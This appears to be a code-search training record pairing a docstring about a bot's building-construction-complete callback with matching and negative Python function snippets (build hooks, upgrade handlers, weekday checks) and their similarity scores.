[ "async def on_building_construction_complete(self, unit: Unit):", "def pre_build(self):\n pass", "def buildStarted(builderName, build):", "def post_build(self):\n pass", "def pre_build(self):", "def build(self):\n pass", "def build(self):\n pass", "def build(self, *args, **kwargs):\n return", "def start_build(self, build_id):\n pass", "def build(self) -> None:", "def post_build(self):", "def _build(self):", "def _build(self):", "def pre_build_hook(self):", "def build(self):", "def build(self):", "def build(self):", "def post_build_hook(self):", "def setup(self):\n build_world.start_level(self)", "def build():", "def build_step(self):\n\n pass", "def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setup_start_agents = False", "def _build(self, **kwargs):", "def initialize(self):\n logger.debug(\"Begin Generation\")\n self.events.begin_generation()", "def build(self):\n\n return True", "def build(self):\n\n return True", "def __init__(self):\n\n super().__init__()\n self.setup_janggi_game()\n self._game_state = 'UNFINISHED'\n self._player_turn = 'BLUE'", "def build_step(self):\n pass", "def build_step(self):\n pass", "def finish_initializing(self, builder):\n #get a reference to the builder and set up the signals\n self.builder = builder\n self.builder.connect_signals(self)\n\n #code for other initialization actions should be added here" ]
[ "0.71568626", "0.70379823", "0.69460714", "0.69012374", "0.6849467", "0.6844997", "0.6844997", "0.67909837", "0.66983306", "0.669102", "0.6681456", "0.6529149", "0.6529149", "0.64592683", "0.6445391", "0.6445391", "0.6445391", "0.64213693", "0.6402814", "0.6315138", "0.6309704", "0.62994426", "0.62782824", "0.62733483", "0.6258543", "0.6258543", "0.6258468", "0.62523526", "0.62523526", "0.62264127" ]
0.8047466
0
Override this in your bot class. This function is called when a building construction is completed.
async def on_building_construction_complete(self, unit: Unit):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def on_building_construction_started(self, unit: Unit):", "def post_build(self):\n pass", "def build(self):\n pass", "def build(self):\n pass", "def post_build(self):", "def build(self, *args, **kwargs):\n return", "def build(self) -> None:", "def buildStarted(builderName, build):", "def post_build_hook(self):", "def _build(self):", "def _build(self):", "def pre_build(self):\n pass", "def build(self):", "def build(self):", "def build(self):", "def build(self):\n\n return True", "def build(self):\n\n return True", "def trigger_build(self, postdata):\n pass", "def finish_initializing(self, builder):\n #get a reference to the builder and set up the signals\n self.builder = builder\n self.builder.connect_signals(self)\n\n #code for other initialization actions should be added here", "def pre_build(self):", "def _build(self, **kwargs):", "def build (self):\n raise NotImplementedError", "def build(self):\n raise NotImplementedError", "def build(self, build):\n\n self._build = build", "def buildFinished(builderName, build, results):", "def build(self):\n\n raise NotImplementedError(\"Implement build() method\")", "def build():", "def build(self):\n raise NotImplementedError(\"This should have been implemented.\")", "def build_step(self):\n\n pass", "def build(_):" ]
[ "0.8173408", "0.7156912", "0.6900785", "0.6900785", "0.68998843", "0.68363357", "0.67636555", "0.6597493", "0.6520906", "0.65182143", "0.65182143", "0.64467186", "0.643994", "0.643994", "0.643994", "0.6406651", "0.6406651", "0.635233", "0.6332181", "0.6324402", "0.6277865", "0.6271622", "0.6268811", "0.62478405", "0.624753", "0.6234444", "0.6220646", "0.6214411", "0.62075275", "0.61850214" ]
0.79730487
1
Override this in your bot class. This function is called with the upgrade id of an upgrade that was not finished last step and is now.
async def on_upgrade_complete(self, upgrade: UpgradeId):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _do_upgrade(self, step):\n request = self.layer['request']\n request.form['profile_id'] = self.profile_id\n request.form['upgrades'] = [step['id']]\n self.setup.manage_doUpgrades(request=request)", "def _do_upgrade(self, step):\n request = self.layer['request']\n request.form['profile_id'] = self.profile_id\n request.form['upgrades'] = [step['id']]\n self.setup.manage_doUpgrades(request=request)", "def _do_upgrade_step(self, step):\n request = self.layer['request']\n request.form['profile_id'] = self.profile_id\n request.form['upgrades'] = [step['id']]\n self.setup.manage_doUpgrades(request=request)", "def _do_upgrade_step(self, step):\n request = self.layer['request']\n request.form['profile_id'] = PROFILE\n request.form['upgrades'] = [step['id']]\n self.setup.manage_doUpgrades(request=request)", "def upgrade(self) -> Optional[pulumi.Input['UpgradeNoteArgs']]:\n return pulumi.get(self, \"upgrade\")", "def upgrade(self) -> pulumi.Output['outputs.UpgradeNoteResponse']:\n return pulumi.get(self, \"upgrade\")", "async def upgrade(\n event,\n spell: ('str', 'select a spell'),\n):\n spell = get_spell_or_abort(spell)\n \n return f'{event.user:f} just upgraded their {spell}; It was a *next* level move!'", "def full_upgrade(self):\n return self.upgrade(\"full-upgrade\")", "def upgrade(self):", "def upgrade(self):", "def test_do_upgrade(self):\n with self.with_config_update():\n result = self.runner.invoke(\n cli,\n [\n \"upgrade\",\n *self.LOCAL,\n self.ITEM_TYPE,\n f\"{self.ITEM_PUBLIC_ID.author}/{self.ITEM_PUBLIC_ID.name}:latest\",\n ],\n standalone_mode=False,\n )\n assert result.exit_code == 0", "def agent_upgrade(self) -> Optional[pulumi.Input['AgentUpgradeArgs']]:\n return pulumi.get(self, \"agent_upgrade\")", "def update_goal(self):\n pass", "def _get_upgrade_step(self, title):\n self.setup.setLastVersionForProfile(self.profile_id, self.from_version)\n upgrades = self.setup.listUpgrades(self.profile_id)\n steps = [s for s in upgrades[0] if s['title'] == title]\n return steps[0] if steps else None", "def getUpgrade(self):\n\t\tquery = ''\n\t\tconn = self.get_connection()\n\t\theaders = { 'Content-type' : 'application/json', 'Authorization' : 'A10 %s' %self.sessionid}\n\t\tconn.request('GET', self.get_path() + '/' + query, headers=headers)\n\t\tresponse = conn.getresponse()\n\t\texpected_status = 200\n\t\terrors = {500: 'An unexpected runtime exception', 404: 'Specified upgrade does not exist'}\n\t\tpayload = self.get_output(response, expected_status, errors)\n\t\tconn.close()\n\t\tif self.debug:\n\t\t\tprint 'payload:', payload\n\t\tif payload == '':\n\t\t\tpayload = None\n\t\tif payload is not None:\n\t\t\tdata = json.loads(payload)\n\t\t\tpayload= data.get('upgrade')\n\t\treturn deserialize_Upgrade_json(payload)", "def agent_upgrade(self) -> pulumi.Output[Optional['outputs.AgentUpgradeResponse']]:\n return pulumi.get(self, \"agent_upgrade\")", "def buyUpgrade(self, upgrade_id: str) -> None:\n # TODO index the available instead so that you don't need to do a search every time\n upgrade_to_buy = next(\n (\n upgrade\n for upgrade in self.available_upgrades\n if upgrade[\"ID\"] == upgrade_id\n )\n )\n # TODO maybe change this into have a more intuitive location for cost\n cost = next(\n (\n requirement.get(\"amount\")\n for requirement in upgrade_to_buy[\"REQUIREMENTS\"]\n if requirement[\"type\"] == \"CURRENCY\"\n ),\n 0,\n )\n\n # TODO fail if the player does not have enough cash\n\n self.changeCash(-cost)\n self.state[UPGRADES].append(upgrade_to_buy)", "def _get_upgrade_step(self, title):\n self.setup.setLastVersionForProfile(PROFILE, self.from_version)\n upgrades = self.setup.listUpgrades(PROFILE)\n steps = [s for s in upgrades[0] if s['title'] == title]\n return steps[0] if steps else None", "def update_turn(self):\n pass", "def mep_260(ctx):\n click.secho(\"Start migration v2.6\", fg=\"cyan\")\n click.secho(\"Nothing\", fg=\"cyan\")", "def upgrade_message(msg):\n wait_for_end_of_video()\n\n if ADDON.getSetting('lastnotified_version') < ADDON_VERSION:\n xbmcgui.Dialog().ok(\n ADDON_NAME,\n '[CR]'.join([localise(msg), localise(32001), localise(32002)])\n )\n else:\n log('Already notified one time for upgrading.')", "def test_upgrade_to_latest_but_same_version(self):\n with pytest.raises(\n ClickException,\n match=r\"The .* with id '.*' already has version .*. Nothing to upgrade.\",\n ):\n self.runner.invoke(\n cli,\n [\n \"upgrade\",\n *self.LOCAL,\n self.ITEM_TYPE,\n f\"{self.ITEM_PUBLIC_ID.author}/{self.ITEM_PUBLIC_ID.name}:latest\",\n ],\n standalone_mode=False,\n catch_exceptions=False,\n )", "def update(self, is_my_turn, clue_word, clue_num_guesses, guesses):\r\n pass", "def submitUpgrade(self, upgrade):\n\t\tquery = ''\n\t\tconn = self.get_connection()\n\t\theaders = { 'Content-type' : 'application/json', 'Authorization' : 'A10 %s' %self.sessionid}\n\t\toutput=OrderedDict()\n\t\toutput['upgrade']=serialize_Upgrade_json(upgrade)\n\t\tpayload = serialize_final_json(output)\n\t\tconn.request('POST', self.get_path() + '/' + query, payload, headers)\n\t\tresponse = conn.getresponse()\n\t\texpected_status = 200\n\t\terrors = {500: 'An unexpected runtime exception'}\n\t\tpayload = self.get_output(response, expected_status, errors)\n\t\tconn.close()\n\t\tif self.debug:\n\t\t\tprint 'payload:', payload\n\t\tif payload == '':\n\t\t\tpayload = None\n\t\treturn deserialize_string_json(payload)", "def after_turn(self):\n pass", "async def _upgrade_db(self) -> None:\n cur_version = await self._get_db_version()\n for n in range(cur_version + 1, sql_data.CUR_VERSION + 1):\n log.msg('Upgrading database to version %d' % n)\n if n in sql_data.SQL_UPGRADES:\n for command in sql_data.SQL_UPGRADES[n]:\n await self.operation(command)\n if cur_version != sql_data.CUR_VERSION:\n await self._set_db_version(sql_data.CUR_VERSION)", "def test_new_upgrade_pending(\n mocker, state, slack, ouw_oc_map, ouw_ocm_map, upgrade_config, dt\n):\n dt.utcnow.return_value = upgrade_at - timedelta(hours=1)\n gso = mocker.patch(\n \"reconcile.openshift_upgrade_watcher._get_start_osd\", autospec=True\n )\n gso.return_value = upgrade_at.strftime(\"%Y-%m-%dT%H:%M:%SZ\"), upgrade_version\n ouw.notify_upgrades_start(\n ocm_map=ouw_ocm_map,\n oc_map=ouw_oc_map,\n clusters=[load_cluster(\"cluster1.yml\")],\n state=state,\n slack=slack,\n )\n assert slack.chat_post_message.call_count == 0\n assert state.add.call_count == 0", "def outdated(self, arguments):\n puts_err(colored.red(\"Not implemented!\"))", "def notify_upgrade(app, flash):\n if app.specter.version.upgrade:\n flash(\n f\"Upgrade notification: new version {app.specter.version.latest} is available.\",\n \"info\",\n )\n return app.specter.version.current", "def command_upgrade(self):\n args = [\n self.cfg.bin_dir / \"arangodb\",\n \"upgrade\",\n \"--starter.endpoint\",\n self.get_http_protocol() + \"://127.0.0.1:\" + str(self.get_my_port()),\n ]\n logging.info(\"StarterManager: Commanding upgrade:\")\n lh.log_cmd(\" \".join([str(arg) for arg in args]))\n self.upgradeprocess = psutil.Popen(\n args,\n # stdout=subprocess.PIPE,\n # stdin=subprocess.PIPE,\n # stderr=subprocess.PIPE,\n universal_newlines=True,\n )\n print(\"Upgrade commander has PID:\" + str(self.upgradeprocess.pid))" ]
[ "0.6285916", "0.6285916", "0.62116206", "0.61345583", "0.61170655", "0.6087209", "0.59450597", "0.5708717", "0.56726635", "0.56726635", "0.56370175", "0.55625856", "0.55596054", "0.55466664", "0.55025387", "0.54930997", "0.5485448", "0.54780704", "0.54131603", "0.53243494", "0.5296793", "0.5269556", "0.52600324", "0.5253681", "0.5249684", "0.5220876", "0.5178374", "0.5156604", "0.5154555", "0.5150112" ]
0.7309425
0
Draw number cards on the specified reportlab canvas
def draw_numbercards(c, n, ncol, nrow, prefix='', suffix='', pagesize=pagesizes.A4, orientation=pagesizes.landscape, margin=(8.4*mm, 8.4*mm), font_family='Arimo-Regular', font_size=20, face_color=(0.1,0.1,0.1), stroke_color=(0.6,0.6,0.6), trimmark=True): # calculate size xmargin, ymargin = margin pwidth, pheight = orientation(pagesize) width = pwidth - xmargin*2 height = pheight - ymargin*2 swidth = width / ncol sheight = height / nrow def draw_trimmark(col, row): x = xmargin + swidth * col y = ymargin + sheight * row if row == 0: c.line(x, ymargin-TRIMMARK_HEIGHT, x, ymargin) c.line(x-TRIMMARK_MINOR_WIDTH/2, ymargin, x+TRIMMARK_MINOR_WIDTH/2, ymargin) elif row == nrow-1: c.line(x, pheight-(ymargin-TRIMMARK_HEIGHT), x, pheight-ymargin) c.line(x-TRIMMARK_MINOR_WIDTH/2, pheight-ymargin, x+TRIMMARK_MINOR_WIDTH/2, pheight-ymargin) if col == 0: c.line(xmargin-TRIMMARK_WIDTH, y, xmargin, y) c.line(xmargin, y-TRIMMARK_MINOR_HEIGHT/2, xmargin, y+TRIMMARK_MINOR_HEIGHT/2) elif col == ncol-1: c.line(pwidth-(xmargin-TRIMMARK_WIDTH), y, pwidth-xmargin, y) c.line(pwidth-xmargin, y-TRIMMARK_MINOR_HEIGHT/2, pwidth-xmargin, y+TRIMMARK_MINOR_HEIGHT/2) index = 1 while index <= n: c.setPageSize(orientation(pagesize)) c.setFont(font_family, font_size) c.setFillColorRGB(*face_color) c.setStrokeColorRGB(*stroke_color) for row in range(nrow): for col in range(ncol): # calculate center x = xmargin + swidth * col + swidth / 2 y = ymargin + sheight * (nrow-row-1) + sheight / 2 # draw number with prefix, suffix c.drawCentredString(x, y, prefix+str(index)+suffix) # increate the number index += 1 # draw trimmark if trimmark: draw_trimmark(col, row) if trimmark: draw_trimmark(ncol, 0) draw_trimmark(ncol, nrow-1) draw_trimmark(0, nrow) draw_trimmark(ncol-1, nrow) # newpage c.showPage() return c
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def draw_numbers(self):\n for i in range(9):\n for j in range(9):\n pos = self.get_pos_in_grid(i, j)\n text = self.grid[i][j]\n text = '' if text == 0 else str(text)\n self.text_to_screen(text, pos)", "def draw(canvas):\n canvas.draw_text('Blackjack', (50, 100), 60, '00FFFF')\n canvas.draw_text('Score ' + str(score), (375, 100), 40, 'Black')\n canvas.draw_text('Dealer', (50, 200), 40, 'Black')\n Dealer.draw(canvas,[50, 225])\n \n if in_play:\n canvas.draw_image(card_back, CARD_BACK_CENTER, CARD_BACK_SIZE, \n [50 + CARD_BACK_CENTER[0], 225 + CARD_BACK_CENTER[1]], CARD_BACK_SIZE)\n \n if Dealer.removed:\n canvas.draw_text('Only first 5 cards shown', \n (175, 350), 20, 'Black')\n \n canvas.draw_text('Player', (50, 400), 40, 'Black')\n canvas.draw_text(outcome, (175, 400), 40, 'Black')\n Player.draw(canvas,[50, 425])\n \n if Player.removed:\n canvas.draw_text('Only first 5 cards shown', (175, 550), 20, 'Black')", "def build_deck_screen_my_deck_duplicate_number_display(card, screen):\n if card.duplicate <= 4:\n button_dup = Button(str(card.duplicate) + 'x','', (250,250,250),(card.rect.x + 50),(card.rect.y - 30) , 30, 30, font_color = (0,0,0), alpha = 150)\n else:\n button_dup = Button(str(card.duplicate) + 'x','', (250,250,250),(card.rect.x + 50),(card.rect.y - 30) , 30, 30, font_color = (255,60,60), alpha = 150)\n button_dup.update()\n button_dup.draw(screen)", "def draw(self, canvas, yloc):\n \n for card in self.hand:\n card.draw(canvas, (xloc+(self.hand.index(card)*CARD_SIZE[0]), yloc))", "def write_given_numbers(self):\n y = self.step_y/2 \n while y < self.height:\n x = self.step_x/2\n while x < self.width:\n\n # find row and column of the board based on the step sizes\n r, c = round((y-self.step_y/2)/self.step_y), round((x-self.step_x/2)/self.step_x)\n number = self.board[r][c] or ''\n self.text_ids[r][c] = self.canvas.create_text(x, y, text=str(number), **style.numbers)\n sleep(0.05)\n self.canvas.update()\n x += self.step_x\n y += self.step_y", "def draw(self, canvas):\r\n # Hide the dealer's total until the round ends\r\n if self.name.upper() == \"DEALER\" and in_play:\r\n value = \"Total: ?\"\r\n elif not start:\r\n value = \"Total: 0\"\r\n else:\r\n value = \"Total: %i\" % (self.hand.get_value())\r\n\r\n line = 1\r\n for text in [value, self.name]:\r\n if self.corner == 1: # Right side of the table\r\n align = RIGHT_ALIGN - frame.get_canvas_textwidth(\r\n text.upper(), FONT_SIZE_SMALLER, FONT_FAMILY)\r\n else:\r\n align = LEFT_ALIGN # Left side of the table\r\n canvas.draw_text(\r\n text.upper(),\r\n [align, CENTER_ALIGN[1] - CARD_CENTER[1] - PADDING * line],\r\n FONT_SIZE_SMALLER, FONT_COLOR, FONT_FAMILY)\r\n line += 1.5", "def draw(canvas):\n if len(cardSelected) == 16:\n label.set_text(\"You Win! Turns taken = \" + str(turns))\n else:\n label.set_text(\"Turns = \" + str(turns))\n Player.draw(canvas, [10, 10])", "def show_digit(digit):\n\n # Create a window for the digit. The digit is 14x14, so create a window \n # which is 150x150. We'll leave a border of 5 pixels, and each digit\n # \"pixel\" will be 10x10\n\n master = Tk()\n\n canvas = Canvas(master, width=150, height=150)\n canvas.pack()\n\n # Draw a rectange for each pixel in the digit\n for i in range(14):\n y = 10*i + 5\n for j in range(14):\n x = 10*j + 5\n \n\n # Determine the hex value of this pixel color\n pixel_value = digit[14*i + j]\n pixel_hex = hex(int(pixel_value*255)).replace('0x','')\n pixel_hex = '#' + pixel_hex + pixel_hex + pixel_hex\n \n # Draw the rectangle\n canvas.create_rectangle(x, y, x+10, y+10, fill=pixel_hex)\n\n # Done!\n return canvas", "def draw(self, canvas, pos):\r\n for card in self.deck:\r\n canvas.draw_image(\r\n card_back, CARD_BACK_CENTER,\r\n CARD_BACK_SIZE, pos, CARD_BACK_SIZE)", "def draw_card(dealer,player): \n depth = 100\n x0,y0 = 100,100\n x1,y1 = 100,300\n\n bj_board.clear()\n for i in range(len(dealer)):\n if dealer[i].state==True:\n bj_board.add(dealer[i].image)\n dealer[i].image.moveTo(x0+i*20,y0)\n dealer[i].image.setDepth(depth-10*i)\n elif dealer[i].state==False:\n img=Image(img_path+\"Back.png\")\n bj_board.add(img)\n img.moveTo(x0+i*20,y0)\n img.setDepth(depth-10*i)\n for i in range(len(player)):\n bj_board.add(player[i].image)\n player[i].image.moveTo(x1+i*20,y1)\n player[i].image.setDepth(depth-10*i) \n \n text=Text(\"Your Total: \" + str(hand_value(player)))\n text.moveTo(300,300)\n bj_board.add(text)\n \n if dealer[0].state==True:\n text=Text(\"Dealer Total: \" + str(hand_value(dealer)))\n text.moveTo(300,100)\n bj_board.add(text)", "def draw_elem_numbers(n):\n return drawNumbers(named(n))", "def addPageNumber(canvas, doc):\n page_num = canvas.getPageNumber()\n text = \"Pag %s\" % page_num\n canvas.drawRightString(200*mm, 10*mm, text)", "def draw_number(self):\n text_color = (0, 0, 0)\n if self.bombs_around == 1:\n text_color = (0, 0, 150)\n if self.bombs_around == 2:\n text_color = (0, 150, 0)\n if self.bombs_around == 3:\n text_color = (150, 0, 0)\n if self.bombs_around == 4:\n text_color = (133, 39, 138)\n if self.bombs_around == 5:\n text_color = (128, 0, 0)\n if self.bombs_around == 6:\n text_color = (175, 238, 238)\n if self.bombs_around == 7:\n text_color = (0, 0, 0)\n if self.bombs_around == 8:\n text_color = (33, 161, 166)\n\n font = pygame.font.Font(\"fonts/JetBrainsMono-Bold.ttf\", 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(\n str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))", "def addPageNum(self, canvas, doc):\n canvas.saveState()\n canvas.setFont('Times-Roman', 10)\n page_num_txt = \"{}\".format(doc.page)\n canvas.drawCentredString(\n 0.75 * inch,\n 0.75 * inch,\n page_num_txt,\n )\n canvas.restoreState()", "def draw(self, canvas, pos): \n \n card_loc = (CARD_CENTER[0] + CARD_SIZE[0] * RANKS.index(self.rank), \n CARD_CENTER[1] + CARD_SIZE[1] * SUITS.index(self.suit))\n canvas.draw_image(card_images, card_loc, \n CARD_SIZE, \n [pos[0] + CARD_CENTER[0], \n pos[1] + CARD_CENTER[1]], \n CARD_SIZE)\n return None", "def draw(canvas):\n global n\n global message\n canvas.draw_text(message, [WIDTH // 2, HEIGTH // 2], 35, 'Gray')\n canvas.draw_text(display(), [250, 20], 25, 'Gray')", "def draw(self, canvas, pos):\r\n # Get card location in the 52-card sprite\r\n card_loc = (CARD_CENTER[0] + CARD_SIZE[0] * RANKS.index(self.rank),\r\n CARD_CENTER[1] + CARD_SIZE[1] * SUITS.index(self.suit))\r\n canvas.draw_image(\r\n card_images, card_loc, CARD_SIZE,\r\n pos, CARD_SIZE)", "def DrawGrid(self, count):\n for i in range(0, self.width, self.incr):\n self.canvas.create_line(i, 100, i, 700, fill = \"#696969\", width = 1)\n for i in range(100, 800, 100):\n self.canvas.create_line(0, i, self.width, i, fill = \"#696969\", width = 1)\n self.canvas.create_rectangle(self.incr * 4, self.height - self.incr * 3.5,\n self.width - self.incr * 4, self.height, fill = \"black\", width = 3)\n for i in range(int(self.height - self.incr * 3.5), self.height, int(self.incr / 4)):\n self.canvas.create_line(self.incr * 4, i, self.width - self.incr * 4,\n i, fill = \"#696969\", width = 1)\n for i in range(self.incr * 4, self.width - self.incr * 4 + 1, int(self.incr / 4)):\n self.canvas.create_line(i, self.height - self.incr * 3.5, i, self.height,\n fill = \"#696969\", width = 1)", "def draw():", "def draw(self, canvas, pos):\n \n # Draw a \"Hand\" as a horizontal sequence of \"Cards\" \n # where the parameter \"pos\" is the position of the\n # upper left corner of the leftmost \"Card\". \n # Note: assume generally that only the first five \n # \"Cards\" of a player's \"Hand\" need to be visible \n # on the \"canvas\".\n for card in self.hand:\n card.draw(canvas, pos) \n pos[0] += CARD_SIZE[0] + X_MARGIN\n \n return None", "def draw_n(self):\r\n pen.down()\r\n pen.left(90)\r\n pen.forward(40)\r\n pen.right(135)\r\n pen.forward(1.414*40)\r\n pen.left(135)\r\n pen.forward(40)\r\n pen.up()\r\n pen.back(40)\r\n pen.right(90)\r\n pen.back(40)\r\n pen.forward(50)", "def draw(self, screen):", "def display(self, canvas, x, y, width, height):\n pass", "def show(self,canvas): \n for piece in self.bluh:\n piece.render(canvas)\n\n #create vertical and horizontal bold outline\n for i in range(len(self.board)+1):\n x0=300+self.piecesize*i\n y0=100\n x1=300+self.piecesize*i\n y1=900\n canvas.create_line(x0,y0,x1,y1,width=5,fill=self.mode.color1)\n for a in range(len(self.board)+1):\n for i in range(len(self.board)+1):\n x2=300\n y2=100+self.piecesize*i\n x3=1100\n y3=100+self.piecesize*i\n canvas.create_line(x2,y2,x3,y3,width=5,fill=self.mode.color1)\n for piece in self.bluh:\n if piece.isselected==True:\n piece.dropShadow(canvas)\n piece.render(canvas)\n #print(piece.__repr__())", "def draw_rectangles_show_points_show_buttons_reset_counters(\n rgb_colours_list_,\n champions_list_for_ocr_,\n origin_champs_counters_to_buy_,\n reader_,\n champions_list_,\n tk_window,\n origin_champs_counters_,\n df_,\n origin_list_,\n origin_counters_,\n class_list_,\n class_counters_,\n mode=\"points\",\n CARDS_TO_BUY_AMOUNT_=CARDS_TO_BUY_AMOUNT,\n LINE_TYPE_=LINE_TYPE,\n MARKER_TYPE_=MARKER_TYPE,\n):\n logging.debug(\n \"Function draw_rectangles_show_points_show_buttons_reset_counters() called\"\n )\n reset_counters_in_list(origin_champs_counters_to_buy_)\n (\n list_of_champs_to_buy_this_turn,\n index_list,\n ) = update_champions_to_buy_from_ocr_detection(\n champions_list_for_ocr_, origin_champs_counters_to_buy_, reader_\n )\n\n champions_to_buy_in_order_as_in_screen = list_of_champs_to_buy_this_turn\n champions_to_buy_points_and_position = show_nonzero_counters_with_points_from_ocr(\n tk_window,\n origin_champs_counters_,\n origin_champs_counters_to_buy_,\n champions_list_,\n df_,\n index_list,\n origin_list_,\n origin_counters_,\n class_list_,\n class_counters_,\n )\n\n champions_position_to_buy_ordered_by_screen = [\n champions_list_for_ocr_.index(i) for i in champions_to_buy_in_order_as_in_screen\n ]\n logging.info(\n \"champions_position_to_buy_ordered_by_screen: %s\",\n champions_position_to_buy_ordered_by_screen,\n )\n\n champions_to_buy_points = list(zip(*champions_to_buy_points_and_position))[0]\n champions_to_buy_position = list(zip(*champions_to_buy_points_and_position))[1]\n logging.info(\n \"Points (in alphabetical by champ name order?): %s\", champions_to_buy_points\n )\n logging.info(\n \"Champions position (in alphabetical by champ name order?): %s\",\n champions_to_buy_position,\n )\n sorted_champions_to_buy_points_and_position = sorted(\n champions_to_buy_points_and_position\n )\n logging.info(\n \"Points and Champions position (in alphabetical by champ name order?): %s\",\n sorted_champions_to_buy_points_and_position,\n )\n sorted_champions_to_buy_position = list(\n zip(*sorted_champions_to_buy_points_and_position)\n )[1]\n logging.info(\n \"sorted_champions_to_buy_position in alphabetical order?: %s\",\n sorted_champions_to_buy_position,\n )\n values_by_points_indexes_order_by_position_on_screen = [\n sorted_champions_to_buy_position.index(i)\n for i in champions_position_to_buy_ordered_by_screen\n ]\n logging.info(\n \"values_by_points_indexes_order_by_position_on_screen 0 worst 4 best card: %s\",\n values_by_points_indexes_order_by_position_on_screen,\n )\n cards_rectangles = build_list_of_champion_cards_rectangles()\n screenshot = make_cropped_ss()[1]\n\n # at the end\n # values_by_points_indexes_order_by_position_on_screen contains champions\n # sorted by points from lowest(0) to highest(4)\n # and indexes represents champion placement on the screen\n\n if mode == \"rectangle\":\n for i in range(0, CARDS_TO_BUY_AMOUNT_):\n cv.rectangle(\n screenshot,\n cards_rectangles[i][0],\n cards_rectangles[i][1],\n color=rgb_colours_list_[\n values_by_points_indexes_order_by_position_on_screen[i]\n ],\n lineType=LINE_TYPE_,\n thickness=2,\n )\n cv.imshow(\n \"draw_rectangles_show_points_show_buttons_reset_counters()\", screenshot\n )\n elif mode == \"cross\":\n for i in range(0, CARDS_TO_BUY_AMOUNT_):\n # Draw the center point\n cv.drawMarker(\n screenshot,\n cards_rectangles[i][2],\n color=rgb_colours_list_[\n values_by_points_indexes_order_by_position_on_screen[i]\n ],\n markerType=MARKER_TYPE_,\n markerSize=40,\n thickness=2,\n )\n cv.imshow(\n \"draw_rectangles_show_points_show_buttons_reset_counters()\", screenshot\n )\n elif mode == \"points\":\n for i in range(0, CARDS_TO_BUY_AMOUNT_):\n # Draw the center point\n cv.putText(\n screenshot,\n \"{:.3f}\".format(\n sorted_champions_to_buy_points_and_position[\n values_by_points_indexes_order_by_position_on_screen[i]\n ][0]\n ),\n cards_rectangles[i][2],\n cv.FONT_HERSHEY_SIMPLEX,\n 0.6,\n rgb_colours_list_[\n values_by_points_indexes_order_by_position_on_screen[i]\n ],\n 2,\n )\n cv.imshow(\n \"draw_rectangles_show_points_show_buttons_reset_counters()\", screenshot\n )\n\n logging.debug(\n \"Function draw_rectangles_show_points_show_buttons_reset_counters() end\"\n )", "def draw_game_number(self): \n self.game_title.draw(self.game_title_rect.topleft)\n pygl2d.draw.line((self.SCREEN_WIDTH / 4 , self.SCREEN_HEIGHT / 16 * 8.5), (self.SCREEN_WIDTH / 4 * 3, self.SCREEN_HEIGHT / 16 * 8.5), (255, 255, 255))\n pygl2d.draw.line((self.SCREEN_WIDTH / 4 , self.SCREEN_HEIGHT / 16 * 5.5), (self.SCREEN_WIDTH / 4 * 3, self.SCREEN_HEIGHT / 16 * 5.5), (255, 255, 255))", "def draw(self):\r\n if len(self.matchPileManager.piles) > 0:\r\n print \"Match Piles\\r\"\r\n for matchPile in self.matchPileManager.piles:\r\n cardListView = CardListView(matchPile.cards)\r\n print \"{0}\\r\".format(cardListView.draw())", "def draw_a_card(cards):\n import random\n card_drawn = random.choices(card_deck)\n cards.append(card_drawn[0])\n return", "def draw_cards(numcards, deck_id, pnum):\n # init list of player's cards\n pnumcards = []\n\n # URL to draw cards from deck\n url = (\n \"https://deckofcardsapi.com/api/deck/\" + deck_id + \"/draw/\"\n ) # URL to draw cards\n\n # parameter for number of cards\n querystring = {\"count\": numcards}\n\n # send GET request\n draw = requests.request(\"GET\", url, params=querystring).json()\n\n # print the number and suit of each card drawn\n for card in draw[\"cards\"]: # parse HTTP response;\n print(\n \"Player #\"\n + str(pnum)\n + \" drew the \"\n + card[\"value\"]\n + \" of \"\n + card[\"suit\"]\n + \"!\"\n )\n # Add card code to list of all cards drawn\n pnumcards.append(card[\"code\"])\n\n # print the number of remaining cards in the deck\n print(f\"\\nThere are {str(draw['remaining'])} cards remaining in the deck.\\n\")\n\n return pnumcards", "def build_deck_screen_grid_display(grid, screen):\n screen.blit(grid.build_deck_screen_card_gallery_grid, grid.build_deck_screen_card_gallery_grid_rect)\n screen.blit(grid.build_deck_screen_deck_grid, grid.build_deck_screen_deck_grid_rect)" ]
[ "0.62303805", "0.61991537", "0.60313904", "0.6023504", "0.5997243", "0.59900504", "0.58882076", "0.5871303", "0.58189374", "0.58185685", "0.57434994", "0.5690685", "0.5635486", "0.56253344", "0.55870515", "0.5569049", "0.55468976", "0.55379665", "0.5537795", "0.5536799", "0.55286735", "0.550999", "0.548536", "0.5474066", "0.5464673", "0.54391086", "0.54375345", "0.5410988", "0.5410232", "0.54053515" ]
0.638798
0
The parameter weekday is True if it is a weekday, and the parameter vacation is True if we are on vacation. We sleep in if it is not a weekday or we're on vacation. Return True if we sleep in.
def sleep_in(weekday, vacation): if not weekday or vacation: return True else: return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sleep_in(weekday, vacation):\r\n if not weekday or vacation:\r\n return True\r\n return False", "def business_day(self): \n\n if self.time_stamp.weekday() not in (5, 6) and not holiday(self.time_stamp):\n return True \n return False", "def is_working_day_appointment(self):\n # function helps hide appointments on weekend\n return 0 <= self.date.weekday() <= 4", "def is_weekday(dtObj):\n return dtObj.weekday() < 5", "def is_weekend() -> bool:\n return datetime.today().weekday() > 3", "def check_weekday(self, date):\n week_next = self.next_seven_day()\n today = datetime.date.today().strftime('%Y-%m-%d')\n if not date or date > week_next or date < today: # check the date is within one week\n return False, \"Sorry you can only booking consultation up to next one week. Your booking date must before {}\".format(week_next)\n try:\n day_as_string = self.get_the_weekday(date)\n if day_as_string == \"Saturday\" or day_as_string == \"Sunday\":\n logger.info(\"Sorry, there is no consultation on weekends\")\n return False, \"Sorry, there is no consultation on weekends\"\n else:\n logger.info(\"It is on next {}\".format(day_as_string))\n return True, \"Your booking has been made on {} {}\".format(day_as_string, date)\n except ValueError as e:\n logger.error(str(e))\n return False, \"Please try again\"", "def is_workfree(date):\n \n return date.weekday() == 6 or is_holiday(date)", "def check_weekday_of_date(self, date):\n return date.isoweekday() % 7", "def has_wednesday(self):\n return self.products.filter(type=\"S\", weekday=3).exists()", "def 